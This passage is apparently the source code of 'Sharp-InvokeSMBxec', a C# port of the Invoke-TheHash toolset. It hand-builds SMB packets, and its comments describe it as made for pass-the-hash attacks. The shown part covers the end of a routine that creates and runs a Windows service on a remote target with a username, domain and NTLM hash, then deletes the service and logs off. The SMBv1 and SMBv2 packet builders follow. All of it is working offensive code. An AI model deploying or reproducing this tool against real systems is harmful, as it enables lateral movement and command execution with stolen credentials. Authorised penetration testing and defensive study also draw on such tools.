Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SCM_Data = SMBExec.SCMDeleteServiceW(SMB_Service_Context_Handle);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "CloseServiceHandle";
SMB_Close_Service_Handle_Stage = 1;
}
break;
case "CloseServiceHandle":
{
if (SMB_Close_Service_Handle_Stage == 1)
{
if (debug) { output.AppendLine(String.Format("Service {0} deleted on {1}", SMB_Service, Target)); }
Service_Deleted = true;
SMB2_Message_ID += 20;
SMB_Close_Service_Handle_Stage++;
Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Context_Handle);
}
else
{
SMB2_Message_ID++;
SMBClientStage = "CloseRequest";
Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Manager_Context_Handle);
}
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
}
break;
case "CloseRequest":
{
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x06, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "TreeDisconnect";
}
break;
case "TreeDisconnect":
{
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x04, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Data = SMBExec.SMB2TreeDisconnectRequest();
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "Logoff";
}
break;
case "Logoff":
{
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x02, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Data = SMBExec.SMB2SessionLogoffRequest();
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "exit";
}
break;
}
}
}
if (!Service_Deleted && !AdminCheck)
{
output.AppendLine("Warning: Service not deleted. Please delete Service \"" + SMB_Service + "\" manually.");
}
}
SMBClient.Close();
SMBClientStream.Close();
}
Console.WriteLine(output.ToString());
}
public static void displayHelp(string message)
{
Console.WriteLine("{0} \r\nSharp-InvokeSMBxec.exe username: domain: hash: target: command:", message);
Environment.Exit(-1);
}
private static byte[] SendStream(NetworkStream stream, byte[] BytesToSend)
{
byte[] BytesReceived = new byte[2048];
stream.Write(BytesToSend, 0, BytesToSend.Length);
stream.Flush();
stream.Read(BytesReceived, 0, BytesReceived.Length);
return BytesReceived;
}
private static byte[] GetNetBIOSSessionService(int SMB_Header_Length, int RPC_Data_Length)
{
OrderedDictionary Packet_NetBIOS_Session_Service = SMBExec.NetBIOSSessionService(SMB_Header_Length, RPC_Data_Length);
byte[] NetBIOS_Session_Service = Utilities.ConvertFromPacketOrderedDictionary(Packet_NetBIOS_Session_Service);
return NetBIOS_Session_Service;
}
}
}
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/Properties/AssemblyInfo.cs
================================================
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SharpInvoke-SMBExec")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SharpInvoke-SMBExec")]
[assembly: AssemblyCopyright("Copyright © 2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("344ee55a-4e32-46f2-a003-69ad52b55945")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/SMBExec.cs
================================================
using System;
using System.Collections.Specialized;
using System.Linq;
namespace SharpInvoke_SMBExec
{
public class SMBExec
{
///
/// SMBExec contains all of the functions used to manually create SMB Packet Structures for Pass the Hash attacks.
///
///
/// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
/// at https://github.com/Kevin-Robertson/Invoke-TheHash)
///
#region SMBv1
public static OrderedDictionary NetBIOSSessionService(int packet_header_length, int packet_data_length)
{
byte[] packet_netbios_session_service_length = BitConverter.GetBytes(packet_header_length + packet_data_length);
packet_netbios_session_service_length = new byte[] { packet_netbios_session_service_length[2], packet_netbios_session_service_length[1], packet_netbios_session_service_length[0] };
OrderedDictionary packet_NetBIOSSessionService = new OrderedDictionary();
packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type", new byte[] { 0x00 });
packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length", packet_netbios_session_service_length);
return packet_NetBIOSSessionService;
}
public static OrderedDictionary SMBHeader(byte[] packet_command, byte[] packet_flags, byte[] packet_flags2, byte[] packet_tree_ID, byte[] packet_process_ID, byte[] packet_user_ID)
{
byte[] ProcessID = new byte[2] { packet_process_ID[0], packet_process_ID[1] };
OrderedDictionary packet_SMBHeader = new OrderedDictionary();
packet_SMBHeader.Add("SMBHeader_Protocol", new byte[] { 0xff, 0x53, 0x4d, 0x42 });
packet_SMBHeader.Add("SMBHeader_Command", packet_command);
packet_SMBHeader.Add("SMBHeader_ErrorClass", new byte[] { 0x00 });
packet_SMBHeader.Add("SMBHeader_Reserved", new byte[] { 0x00 });
packet_SMBHeader.Add("SMBHeader_ErrorCode", new byte[] { 0x00, 0x00 });
packet_SMBHeader.Add("SMBHeader_Flags", packet_flags);
packet_SMBHeader.Add("SMBHeader_Flags2", packet_flags2);
packet_SMBHeader.Add("SMBHeader_ProcessIDHigh", new byte[] { 0x00, 0x00 });
packet_SMBHeader.Add("SMBHeader_Signature", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMBHeader.Add("SMBHeader_Reserved2", new byte[] { 0x00, 0x00 });
packet_SMBHeader.Add("SMBHeader_TreeID", packet_tree_ID);
packet_SMBHeader.Add("SMBHeader_ProcessID", ProcessID);
packet_SMBHeader.Add("SMBHeader_UserID", packet_user_ID);
packet_SMBHeader.Add("SMBHeader_MultiplexID", new byte[] { 0x00, 0x00 });
return packet_SMBHeader;
}
public static OrderedDictionary SMBNegotiateProtocolRequest(bool ForceSMB1)
{
byte[] packet_byte_count;
if (ForceSMB1)
{
packet_byte_count = new byte[] { 0x0c, 0x00 };
}
else
{
packet_byte_count = new byte[] { 0x22, 0x00 };
}
//https://msdn.microsoft.com/en-us/library/ee441572.aspx
OrderedDictionary packet_SMBNegotiateProtocolRequest = new OrderedDictionary();
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount", new byte[] { 0x00 });
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount", packet_byte_count);
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat", new byte[] { 0x02 });
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name", new byte[] { 0x4e, 0x54, 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00 });
if (!ForceSMB1)
{
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2", new byte[] { 0x02 });
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2", new byte[] { 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e, 0x30, 0x30, 0x32, 0x00 });
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3", new byte[] { 0x02 });
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3", new byte[] { 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e, 0x3f, 0x3f, 0x3f, 0x00 });
}
return packet_SMBNegotiateProtocolRequest;
}
public static OrderedDictionary SMBSessionSetupAndXRequest(byte[] packet_security_blob)
{
//https://msdn.microsoft.com/en-us/library/ee441849.aspx
byte[] packet_byte_count = BitConverter.GetBytes(packet_security_blob.Length);
byte[] packet_byte_count2 = { packet_byte_count[0], packet_byte_count[1] };
byte[] packet_security_blob_length = BitConverter.GetBytes(packet_security_blob.Length + 5);
byte[] packet_security_blob_length2 = { packet_security_blob_length[0], packet_security_blob_length[1] };
OrderedDictionary packet_SMBSessionSetupAndXRequest = new OrderedDictionary();
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount", new byte[] { 0x0c });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer", new byte[] { 0xff, 0xff });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount", new byte[] { 0x02, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber", new byte[] { 0x01, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength", packet_byte_count2);
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities", new byte[] { 0x44, 0x00, 0x00, 0x80 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount", packet_security_blob_length2);
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob", packet_security_blob);
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS", new byte[] { 0x00, 0x00, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage", new byte[] { 0x00, 0x00 });
return packet_SMBSessionSetupAndXRequest;
}
public static OrderedDictionary SMBTreeConnectAndXRequest(byte[] packet_path)
{
byte[] packet_path_length = BitConverter.GetBytes(packet_path.Length + 7);
packet_path_length = new byte[] { packet_path_length[0], packet_path_length[1] };
OrderedDictionary packet_SMBTreeConnectAndXRequest = new OrderedDictionary();
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount", new byte[] { 0x04 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags", new byte[] { 0x00, 0x00 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength", new byte[] { 0x01, 0x00 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount", packet_path_length);
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password", new byte[] { 0x00 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree", packet_path);
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service", new byte[] { 0x3f, 0x3f, 0x3f, 0x3f, 0x3f, 0x00 });
return packet_SMBTreeConnectAndXRequest;
}
public static OrderedDictionary SMBNTCreateAndXRequest(byte[] packet_named_pipe)
{
byte[] packet_named_pipe_length = BitConverter.GetBytes(packet_named_pipe.Length);
byte[] packet_named_pipe_length2 = { packet_named_pipe_length[0], packet_named_pipe_length[1] };
byte[] packet_file_name_length = BitConverter.GetBytes(packet_named_pipe.Length - 1);
byte[] packet_file_name_length2 = { packet_file_name_length[0], packet_file_name_length[1] };
OrderedDictionary packet_SMBNTCreateAndXRequest = new OrderedDictionary();
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount", new byte[] { 0x18 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2", new byte[] { 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen", packet_file_name_length2);
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags", new byte[] { 0x16, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask", new byte[] { 0x00, 0x00, 0x00, 0x02 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess", new byte[] { 0x07, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation", new byte[] { 0x02, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags", new byte[] { 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount", packet_named_pipe_length2);
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename", packet_named_pipe);
return packet_SMBNTCreateAndXRequest;
}
public static OrderedDictionary SMBReadAndXRequest(byte[] SMB_FID)
{
if (SMB_FID == null)
{
SMB_FID = new byte[] { 0x00, 0x40 };
}
OrderedDictionary packet_SMBReadAndXRequest = new OrderedDictionary();
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount", new byte[] { 0x0a });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID", SMB_FID);
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow", new byte[] { 0x58, 0x02 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount", new byte[] { 0x58, 0x02 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown", new byte[] { 0xff, 0xff, 0xff, 0xff });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining", new byte[] { 0x00, 0x00 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount", new byte[] { 0x00, 0x00 });
return packet_SMBReadAndXRequest;
}
public static OrderedDictionary SMBWriteAndXRequest(byte[] packet_file_ID, int packet_RPC_length)
{
byte[] packet_write_length = BitConverter.GetBytes(packet_RPC_length);
packet_write_length = new byte[] { packet_write_length[0], packet_write_length[1] };
OrderedDictionary packet_SMBWriteAndXRequest = new OrderedDictionary();
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount", new byte[] { 0x0e });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID", packet_file_ID);
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset", new byte[] { 0xea, 0x03, 0x00, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2", new byte[] { 0xff, 0xff, 0xff, 0xff });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode", new byte[] { 0x08, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining", packet_write_length);
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh", new byte[] { 0x00, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow", packet_write_length);
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset", new byte[] { 0x3f, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount", packet_write_length);
return packet_SMBWriteAndXRequest;
}
public static OrderedDictionary SMBCloseRequest(byte[] packet_file_ID)
{
OrderedDictionary packet_SMBCloseRequest = new OrderedDictionary();
packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount", new byte[] { 0x03 });
packet_SMBCloseRequest.Add("SMBCloseRequest_FID", packet_file_ID);
packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite", new byte[] { 0xff, 0xff, 0xff, 0xff });
packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount", new byte[] { 0x00, 0x00 });
return packet_SMBCloseRequest;
}
public static OrderedDictionary SMBTreeDisconnectRequest()
{
OrderedDictionary packet_SMBTreeDisconnectRequest = new OrderedDictionary();
packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount", new byte[] { 0x00 });
packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount", new byte[] { 0x00, 0x00 });
return packet_SMBTreeDisconnectRequest;
}
public static OrderedDictionary SMBLogoffAndXRequest()
{
OrderedDictionary packet_SMBLogoffAndXRequest = new OrderedDictionary();
packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount", new byte[] { 0x02 });
packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount", new byte[] { 0x00, 0x00 });
return packet_SMBLogoffAndXRequest;
}
#endregion
#region SMBv2
//public static OrderedDictionary SMB2Header(byte[] packet_command,bool SMB_signing, int packet_message_ID, byte[] process_id, byte[] packet_tree_ID, byte[] packet_session_ID)
public static OrderedDictionary SMB2Header(byte[] packet_command, int packet_message_ID, byte[] packet_tree_ID, byte[] packet_session_ID)
{
byte[] message_ID = BitConverter.GetBytes(packet_message_ID);
if (message_ID.Length == 4)
{
message_ID = message_ID.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
//message_ID = Utilities.CombineByteArray(message_ID, new byte[] { 0x00, 0x00, 0x00, 0x00 });
}
OrderedDictionary packet_SMB2Header = new OrderedDictionary();
packet_SMB2Header.Add("SMB2Header_ProtocolID", new byte[] { 0xfe, 0x53, 0x4d, 0x42 });
packet_SMB2Header.Add("SMB2Header_StructureSize", new byte[] { 0x40, 0x00 });
packet_SMB2Header.Add("SMB2Header_CreditCharge", new byte[] { 0x01, 0x00 });
packet_SMB2Header.Add("SMB2Header_ChannelSequence", new byte[] { 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_Reserved", new byte[] { 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_Command", packet_command);
packet_SMB2Header.Add("SMB2Header_CreditRequest", new byte[] { 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_NextCommand", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_MessageID", message_ID);
packet_SMB2Header.Add("SMB2Header_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_TreeID", packet_tree_ID);
packet_SMB2Header.Add("SMB2Header_SessionID", packet_session_ID);
packet_SMB2Header.Add("SMB2Header_Signature", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
return packet_SMB2Header;
}
public static OrderedDictionary SMB2NegotiateProtocolRequest()
{
OrderedDictionary packet_SMB2NegotiateProtocolRequest = new OrderedDictionary();
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize", new byte[] { 0x24, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount", new byte[] { 0x02, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode", new byte[] { 0x01, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved", new byte[] { 0x00, 0x00 });
